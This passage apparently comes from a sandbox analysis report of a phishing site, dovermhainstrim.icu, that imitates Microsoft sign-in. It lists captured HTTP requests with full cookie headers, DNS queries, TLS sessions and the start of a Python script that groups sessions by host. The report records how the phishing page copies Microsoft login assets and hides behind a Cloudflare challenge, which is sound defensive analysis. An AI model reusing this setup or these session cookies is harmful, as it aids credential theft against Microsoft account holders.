esctx-VY3rupLN5GQ=AQABCQEAAABVrSpeuWamRam2jAF1XRQEq7YCGbhTl2NQZDFCvuEhB6mGIKplOOaSLSlElqwfwuGVdnLBoVzVZD6qEZEL4Thm5HEfMrAWEmLSeOpBFYzeWc3aAXWzzzL-jsE0WwKcnNGMUeBoJjmQ6rKRtE52ZvkeWAVEw2ONuuJE6mnJ2_dK0CAA; fpc=AsBHwmgyh1FHvpRevDBxAH-4vjNwAQAAAD1Mdt8OAAAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; brcap=0
      Source: global trafficHTTP traffic detected: GET /aadcdn.msauth.net/~/shared/1.0/content/images/microsoft_logo_ee5c8d9fb6248c938fd0dc19370e90bd.svg HTTP/1.1Host: dovermhainstrim.icuConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: qPdM=XME5fHaVTIUF; qPdM.sig=LuQjWO5PikFypEDMzekIWFwTUhE; buid=1.AXwAqzBRR7ViQUKp00fjfJvCFakreHKQRANPjYJWI3DqNWYBAAB8AA.AQABGgEAAABVrSpeuWamRam2jAF1XRQEl06i46wFSPXmDuhq6hxJsl4kRFWFHrfFjlskG1xxwUUkKcLXc6eBLuPU7wnXpW6twRRr5Eyk9-0TQmN5xz0E7AXWAD4m4-UfaubT4koWqLogAA; esctx=PAQABBwEAAABVrSpeuWamRam2jAF1XRQEYrypCpjwOqcZedUbRsx05Qz22NPpTcg9D2noiE3oTMJIMDkAvbs7iY7puSAYWIpLDAn6yyqHi1ACkwITC8iFVFQktqKnG66hCLumzVVmpnogPyYG4Gy2a8CQ9wUVWbVtbW-ttrr6MfyAcWfwrZIKw5BskWfRuNVn-rtZVVgt7AUgAA; esctx-VY3rupLN5GQ=AQABCQEAAABVrSpeuWamRam2jAF1XRQEq7YCGbhTl2NQZDFCvuEhB6mGIKplOOaSLSlElqwfwuGVdnLBoVzVZD6qEZEL4Thm5HEfMrAWEmLSeOpBFYzeWc3aAXWzzzL-jsE0WwKcnNGMUeBoJjmQ6rKRtE52ZvkeWAVEw2ONuuJE6mnJ2_dK0CAA; fpc=AsBHwmgyh1FHvpRevDBxAH-4vjNwAQAAAD1Mdt8OAAAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; brcap=0
      Source: global trafficHTTP traffic detected: GET /aadcdn.msauth.net/~/shared/1.0/content/images/backgrounds/2_bc3d32a696895f78c19df6c717586a5d.svg HTTP/1.1Host: dovermhainstrim.icuConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: qPdM=XME5fHaVTIUF; qPdM.sig=LuQjWO5PikFypEDMzekIWFwTUhE; buid=1.AXwAqzBRR7ViQUKp00fjfJvCFakreHKQRANPjYJWI3DqNWYBAAB8AA.AQABGgEAAABVrSpeuWamRam2jAF1XRQEl06i46wFSPXmDuhq6hxJsl4kRFWFHrfFjlskG1xxwUUkKcLXc6eBLuPU7wnXpW6twRRr5Eyk9-0TQmN5xz0E7AXWAD4m4-UfaubT4koWqLogAA; esctx=PAQABBwEAAABVrSpeuWamRam2jAF1XRQEYrypCpjwOqcZedUbRsx05Qz22NPpTcg9D2noiE3oTMJIMDkAvbs7iY7puSAYWIpLDAn6yyqHi1ACkwITC8iFVFQktqKnG66hCLumzVVmpnogPyYG4Gy2a8CQ9wUVWbVtbW-ttrr6MfyAcWfwrZIKw5BskWfRuNVn-rtZVVgt7AUgAA; esctx-VY3rupLN5GQ=AQABCQEAAABVrSpeuWamRam2jAF1XRQEq7YCGbhTl2NQZDFCvuEhB6mGIKplOOaSLSlElqwfwuGVdnLBoVzVZD6qEZEL4Thm5HEfMrAWEmLSeOpBFYzeWc3aAXWzzzL-jsE0WwKcnNGMUeBoJjmQ6rKRtE52ZvkeWAVEw2ONuuJE6mnJ2_dK0CAA; fpc=AsBHwmgyh1FHvpRevDBxAH-4vjNwAQAAAD1Mdt8OAAAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; brcap=0
      Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: e23a311b.5f438d8b1fa34021ffea2c2f.workers.devConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://e23a311b.5f438d8b1fa34021ffea2c2f.workers.dev/&umid=ea64e973-4742-4a13-b7e6-f166cfb5aedf&auth=4c13a8eb8816953c02b02599c881676174c26b4b-2d2cb8f6bf763978670ab6e3d03aef460cd5c82cAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /aadcdn.msauth.net/~/shared/1.0/content/images/signin-options_4e48046ce74f4b89d45037c90576bfac.svg HTTP/1.1Host: dovermhainstrim.icuConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: qPdM=XME5fHaVTIUF; qPdM.sig=LuQjWO5PikFypEDMzekIWFwTUhE; buid=1.AXwAqzBRR7ViQUKp00fjfJvCFakreHKQRANPjYJWI3DqNWYBAAB8AA.AQABGgEAAABVrSpeuWamRam2jAF1XRQEl06i46wFSPXmDuhq6hxJsl4kRFWFHrfFjlskG1xxwUUkKcLXc6eBLuPU7wnXpW6twRRr5Eyk9-0TQmN5xz0E7AXWAD4m4-UfaubT4koWqLogAA; esctx=PAQABBwEAAABVrSpeuWamRam2jAF1XRQEYrypCpjwOqcZedUbRsx05Qz22NPpTcg9D2noiE3oTMJIMDkAvbs7iY7puSAYWIpLDAn6yyqHi1ACkwITC8iFVFQktqKnG66hCLumzVVmpnogPyYG4Gy2a8CQ9wUVWbVtbW-ttrr6MfyAcWfwrZIKw5BskWfRuNVn-rtZVVgt7AUgAA; esctx-VY3rupLN5GQ=AQABCQEAAABVrSpeuWamRam2jAF1XRQEq7YCGbhTl2NQZDFCvuEhB6mGIKplOOaSLSlElqwfwuGVdnLBoVzVZD6qEZEL4Thm5HEfMrAWEmLSeOpBFYzeWc3aAXWzzzL-jsE0WwKcnNGMUeBoJjmQ6rKRtE52ZvkeWAVEw2ONuuJE6mnJ2_dK0CAA; fpc=AsBHwmgyh1FHvpRevDBxAH-4vjNwAQAAAD1Mdt8OAAAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; brcap=0
      Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: e23a311b.5f438d8b1fa34021ffea2c2f.workers.devConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /aadcdn.msauth.net/~/shared/1.0/content/images/marching_ants_white_166de53471265253ab3a456defe6da23.gif HTTP/1.1Host: dovermhainstrim.icuConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://dovermhainstrim.icu/index.html//?uuq_tgnqcf=vtwgAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: qPdM=XME5fHaVTIUF; qPdM.sig=LuQjWO5PikFypEDMzekIWFwTUhE; buid=1.AXwAqzBRR7ViQUKp00fjfJvCFakreHKQRANPjYJWI3DqNWYBAAB8AA.AQABGgEAAABVrSpeuWamRam2jAF1XRQEl06i46wFSPXmDuhq6hxJsl4kRFWFHrfFjlskG1xxwUUkKcLXc6eBLuPU7wnXpW6twRRr5Eyk9-0TQmN5xz0E7AXWAD4m4-UfaubT4koWqLogAA; esctx=PAQABBwEAAABVrSpeuWamRam2jAF1XRQEYrypCpjwOqcZedUbRsx05Qz22NPpTcg9D2noiE3oTMJIMDkAvbs7iY7puSAYWIpLDAn6yyqHi1ACkwITC8iFVFQktqKnG66hCLumzVVmpnogPyYG4Gy2a8CQ9wUVWbVtbW-ttrr6MfyAcWfwrZIKw5BskWfRuNVn-rtZVVgt7AUgAA; esctx-VY3rupLN5GQ=AQABCQEAAABVrSpeuWamRam2jAF1XRQEq7YCGbhTl2NQZDFCvuEhB6mGIKplOOaSLSlElqwfwuGVdnLBoVzVZD6qEZEL4Thm5HEfMrAWEmLSeOpBFYzeWc3aAXWzzzL-jsE0WwKcnNGMUeBoJjmQ6rKRtE52ZvkeWAVEw2ONuuJE6mnJ2_dK0CAA; fpc=AsBHwmgyh1FHvpRevDBxAH-4vjNwAQAAAD1Mdt8OAAAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; brcap=0
      Source: global trafficHTTP traffic detected: GET /aadcdn.msauth.net/~/shared/1.0/content/images/marching_ants_b540a8e518037192e32c4fe58bf2dbab.gif HTTP/1.1Host: dovermhainstrim.icuConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://dovermhainstrim.icu/index.html//?uuq_tgnqcf=vtwgAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: qPdM=XME5fHaVTIUF; qPdM.sig=LuQjWO5PikFypEDMzekIWFwTUhE; buid=1.AXwAqzBRR7ViQUKp00fjfJvCFakreHKQRANPjYJWI3DqNWYBAAB8AA.AQABGgEAAABVrSpeuWamRam2jAF1XRQEl06i46wFSPXmDuhq6hxJsl4kRFWFHrfFjlskG1xxwUUkKcLXc6eBLuPU7wnXpW6twRRr5Eyk9-0TQmN5xz0E7AXWAD4m4-UfaubT4koWqLogAA; esctx=PAQABBwEAAABVrSpeuWamRam2jAF1XRQEYrypCpjwOqcZedUbRsx05Qz22NPpTcg9D2noiE3oTMJIMDkAvbs7iY7puSAYWIpLDAn6yyqHi1ACkwITC8iFVFQktqKnG66hCLumzVVmpnogPyYG4Gy2a8CQ9wUVWbVtbW-ttrr6MfyAcWfwrZIKw5BskWfRuNVn-rtZVVgt7AUgAA; esctx-VY3rupLN5GQ=AQABCQEAAABVrSpeuWamRam2jAF1XRQEq7YCGbhTl2NQZDFCvuEhB6mGIKplOOaSLSlElqwfwuGVdnLBoVzVZD6qEZEL4Thm5HEfMrAWEmLSeOpBFYzeWc3aAXWzzzL-jsE0WwKcnNGMUeBoJjmQ6rKRtE52ZvkeWAVEw2ONuuJE6mnJ2_dK0CAA; fpc=AsBHwmgyh1FHvpRevDBxAH-4vjNwAQAAAD1Mdt8OAAAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; brcap=0
      Source: global trafficHTTP traffic detected: GET /aadcdn.msauth.net/~/shared/1.0/content/images/marching_ants_b540a8e518037192e32c4fe58bf2dbab.gif HTTP/1.1Host: dovermhainstrim.icuConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: qPdM=XME5fHaVTIUF; qPdM.sig=LuQjWO5PikFypEDMzekIWFwTUhE; buid=1.AXwAqzBRR7ViQUKp00fjfJvCFakreHKQRANPjYJWI3DqNWYBAAB8AA.AQABGgEAAABVrSpeuWamRam2jAF1XRQEl06i46wFSPXmDuhq6hxJsl4kRFWFHrfFjlskG1xxwUUkKcLXc6eBLuPU7wnXpW6twRRr5Eyk9-0TQmN5xz0E7AXWAD4m4-UfaubT4koWqLogAA; esctx=PAQABBwEAAABVrSpeuWamRam2jAF1XRQEYrypCpjwOqcZedUbRsx05Qz22NPpTcg9D2noiE3oTMJIMDkAvbs7iY7puSAYWIpLDAn6yyqHi1ACkwITC8iFVFQktqKnG66hCLumzVVmpnogPyYG4Gy2a8CQ9wUVWbVtbW-ttrr6MfyAcWfwrZIKw5BskWfRuNVn-rtZVVgt7AUgAA; esctx-VY3rupLN5GQ=AQABCQEAAABVrSpeuWamRam2jAF1XRQEq7YCGbhTl2NQZDFCvuEhB6mGIKplOOaSLSlElqwfwuGVdnLBoVzVZD6qEZEL4Thm5HEfMrAWEmLSeOpBFYzeWc3aAXWzzzL-jsE0WwKcnNGMUeBoJjmQ6rKRtE52ZvkeWAVEw2ONuuJE6mnJ2_dK0CAA; fpc=AsBHwmgyh1FHvpRevDBxAH-4vjNwAQAAAD1Mdt8OAAAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; brcap=0
      Source: global trafficHTTP traffic detected: GET /aadcdn.msauth.net/~/shared/1.0/content/images/marching_ants_white_166de53471265253ab3a456defe6da23.gif HTTP/1.1Host: dovermhainstrim.icuConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: qPdM=XME5fHaVTIUF; qPdM.sig=LuQjWO5PikFypEDMzekIWFwTUhE; buid=1.AXwAqzBRR7ViQUKp00fjfJvCFakreHKQRANPjYJWI3DqNWYBAAB8AA.AQABGgEAAABVrSpeuWamRam2jAF1XRQEl06i46wFSPXmDuhq6hxJsl4kRFWFHrfFjlskG1xxwUUkKcLXc6eBLuPU7wnXpW6twRRr5Eyk9-0TQmN5xz0E7AXWAD4m4-UfaubT4koWqLogAA; esctx=PAQABBwEAAABVrSpeuWamRam2jAF1XRQEYrypCpjwOqcZedUbRsx05Qz22NPpTcg9D2noiE3oTMJIMDkAvbs7iY7puSAYWIpLDAn6yyqHi1ACkwITC8iFVFQktqKnG66hCLumzVVmpnogPyYG4Gy2a8CQ9wUVWbVtbW-ttrr6MfyAcWfwrZIKw5BskWfRuNVn-rtZVVgt7AUgAA; esctx-VY3rupLN5GQ=AQABCQEAAABVrSpeuWamRam2jAF1XRQEq7YCGbhTl2NQZDFCvuEhB6mGIKplOOaSLSlElqwfwuGVdnLBoVzVZD6qEZEL4Thm5HEfMrAWEmLSeOpBFYzeWc3aAXWzzzL-jsE0WwKcnNGMUeBoJjmQ6rKRtE52ZvkeWAVEw2ONuuJE6mnJ2_dK0CAA; fpc=AsBHwmgyh1FHvpRevDBxAH-4vjNwAQAAAD1Mdt8OAAAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; brcap=0
      Source: global trafficHTTP traffic detected: GET /common/GetCredentialType?mkt=en-US HTTP/1.1Host: dovermhainstrim.icuConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: qPdM=XME5fHaVTIUF; qPdM.sig=LuQjWO5PikFypEDMzekIWFwTUhE; buid=1.AXwAqzBRR7ViQUKp00fjfJvCFakreHKQRANPjYJWI3DqNWYBAAB8AA.AQABGgEAAABVrSpeuWamRam2jAF1XRQEl06i46wFSPXmDuhq6hxJsl4kRFWFHrfFjlskG1xxwUUkKcLXc6eBLuPU7wnXpW6twRRr5Eyk9-0TQmN5xz0E7AXWAD4m4-UfaubT4koWqLogAA; esctx=PAQABBwEAAABVrSpeuWamRam2jAF1XRQEYrypCpjwOqcZedUbRsx05Qz22NPpTcg9D2noiE3oTMJIMDkAvbs7iY7puSAYWIpLDAn6yyqHi1ACkwITC8iFVFQktqKnG66hCLumzVVmpnogPyYG4Gy2a8CQ9wUVWbVtbW-ttrr6MfyAcWfwrZIKw5BskWfRuNVn-rtZVVgt7AUgAA; esctx-VY3rupLN5GQ=AQABCQEAAABVrSpeuWamRam2jAF1XRQEq7YCGbhTl2NQZDFCvuEhB6mGIKplOOaSLSlElqwfwuGVdnLBoVzVZD6qEZEL4Thm5HEfMrAWEmLSeOpBFYzeWc3aAXWzzzL-jsE0WwKcnNGMUeBoJjmQ6rKRtE52ZvkeWAVEw2ONuuJE6mnJ2_dK0CAA; fpc=AsBHwmgyh1FHvpRevDBxAH-4vjNwAQAAAD1Mdt8OAAAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; brcap=0
      Source: global trafficDNS traffic detected: DNS query: e23a311b.5f438d8b1fa34021ffea2c2f.workers.dev
      Source: global trafficDNS traffic detected: DNS query: cdn.jsdelivr.net
      Source: global trafficDNS traffic detected: DNS query: challenges.cloudflare.com
      Source: global trafficDNS traffic detected: DNS query: www.google.com
      Source: global trafficDNS traffic detected: DNS query: dovermhainstrim.icu
      Source: global trafficDNS traffic detected: DNS query: aadcdn.msftauth.net
      Source: global trafficDNS traffic detected: DNS query: identity.nel.measure.office.net
      Source: global trafficDNS traffic detected: DNS query: portal.microsoftonline.com
      Source: unknownHTTP traffic detected: POST /cdn-cgi/challenge-platform/h/b/flow/ov1/1919245856:1743013575:nXXmh0HbrHlQXpy4m6h5G9OJr9O9QhmryX8dJ0tI8rA/92690b6b4f3ea0f4/SI2OlB0D9.xPaJ8PeD3gTYOjfN8pF9UL6rRfejF24mg-1743017238-1.1.1.1-tcSKqP5HF769OqdkR4FoX5VopIdLNxdgvM8DJn0Ff7mTPcQhDmyZDxZvGHdown3W HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveContent-Length: 3614sec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Content-Type: text/plain;charset=UTF-8cf-chl: SI2OlB0D9.xPaJ8PeD3gTYOjfN8pF9UL6rRfejF24mg-1743017238-1.1.1.1-tcSKqP5HF769OqdkR4FoX5VopIdLNxdgvM8DJn0Ff7mTPcQhDmyZDxZvGHdown3Wcf-chl-ra: 0sec-ch-ua-mobile: ?0Accept: */*Origin: https://challenges.cloudflare.comSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/n74pt/0x4AAAAAABCn2aXTjicCpvuc/auto/fbE/new/normal/auto/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: no-store, no-cacheContent-Length: 1245Content-Type: text/htmlSet-Cookie: s.SessID=c47263a9-0123-4f08-8140-3ef73120f81d; path=/; secure; HttpOnly; SameSite=NoneSet-Cookie: s.SessID=c47263a9-0123-4f08-8140-3ef73120f81d; path=/; secure; HttpOnly; SameSite=NoneSet-Cookie: x-portal-routekey=eus; path=/; secure; HttpOnlyx-ms-correlation-id: 25ef1542-6906-42bc-bd8f-5f5fbcf962a5X-Content-Type-Options: nosniffX-UA-Compatible: IE=EdgeX-Cache: CONFIG_NOCACHEX-MSEdge-Ref: Ref A: F0E09B4B36784451938D69617802F246 Ref B: BL2AA2030102021 Ref C: 2025-03-26T19:28:01ZDate: Wed, 26 Mar 2025 19:28:00 GMTConnection: close
      Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
      Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49702
      Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49701
      Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
      Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
      Source: unknownNetwork traffic detected: HTTP traffic on port 49679 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
      Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49671 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
      Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
      Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
      Source: unknownNetwork traffic detected: HTTP traffic on port 49702 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
      Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
      Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
      Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
      Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
      Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
Source: unknown | HTTPS traffic detected (server -> client, negotiated version):
Server | Client | Version
104.21.13.238:443 | 192.168.2.16:49702 | TLS 1.2
104.21.13.238:443 | 192.168.2.16:49701 | TLS 1.2
104.18.187.31:443 | 192.168.2.16:49709 | TLS 1.2
104.18.94.41:443 | 192.168.2.16:49710 | TLS 1.2
104.18.95.41:443 | 192.168.2.16:49712 | TLS 1.2
104.18.94.41:443 | 192.168.2.16:49715 | TLS 1.2
104.21.13.238:443 | 192.168.2.16:49717 | TLS 1.2
142.251.35.164:443 | 192.168.2.16:49720 | TLS 1.2
2.23.227.208:443 | 192.168.2.16:49729 | TLS 1.2
143.198.129.211:443 | 192.168.2.16:49751 | TLS 1.2
13.107.246.40:443 | 192.168.2.16:49753 | TLS 1.2
23.219.36.138:443 | 192.168.2.16:49758 | TLS 1.2
13.107.9.156:443 | 192.168.2.16:49764 | TLS 1.2
143.198.129.211:443 | 192.168.2.16:49768 | TLS 1.2
143.198.129.211:443 | 192.168.2.16:49769 | TLS 1.2
143.198.129.211:443 | 192.168.2.16:49770 | TLS 1.2
143.198.129.211:443 | 192.168.2.16:49777 | TLS 1.2
143.198.129.211:443 | 192.168.2.16:49779 | TLS 1.2
143.198.129.211:443 | 192.168.2.16:49778 | TLS 1.2
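The HTTPS rows above are more useful once they are grouped by destination host: that shows which server received most of the TLS sessions and, from the client-port order, roughly the order in which Chrome was bounced from host to host. The following is an added triage script written for this page, not Joe Sandbox output. The session rows and the IP-to-hostname map are copied from this report's own tables (the report leaves 2.23.227.208 and 104.18.95.41 unresolved, so they stay as bare IPs); the parsing and grouping logic is the editor's.

```python
"""Group this report's 'HTTPS traffic detected' rows by destination host.

Added example for this report page, not Joe Sandbox output. The rows and
the IP-to-hostname map are copied from the report; the code is the editor's.
"""
import re
from collections import Counter, defaultdict

# The 19 HTTPS rows from the report, server -> client, as printed there.
HTTPS_LINES = """\
104.21.13.238:443 -> 192.168.2.16:49702 version: TLS 1.2
104.21.13.238:443 -> 192.168.2.16:49701 version: TLS 1.2
104.18.187.31:443 -> 192.168.2.16:49709 version: TLS 1.2
104.18.94.41:443 -> 192.168.2.16:49710 version: TLS 1.2
104.18.95.41:443 -> 192.168.2.16:49712 version: TLS 1.2
104.18.94.41:443 -> 192.168.2.16:49715 version: TLS 1.2
104.21.13.238:443 -> 192.168.2.16:49717 version: TLS 1.2
142.251.35.164:443 -> 192.168.2.16:49720 version: TLS 1.2
2.23.227.208:443 -> 192.168.2.16:49729 version: TLS 1.2
143.198.129.211:443 -> 192.168.2.16:49751 version: TLS 1.2
13.107.246.40:443 -> 192.168.2.16:49753 version: TLS 1.2
23.219.36.138:443 -> 192.168.2.16:49758 version: TLS 1.2
13.107.9.156:443 -> 192.168.2.16:49764 version: TLS 1.2
143.198.129.211:443 -> 192.168.2.16:49768 version: TLS 1.2
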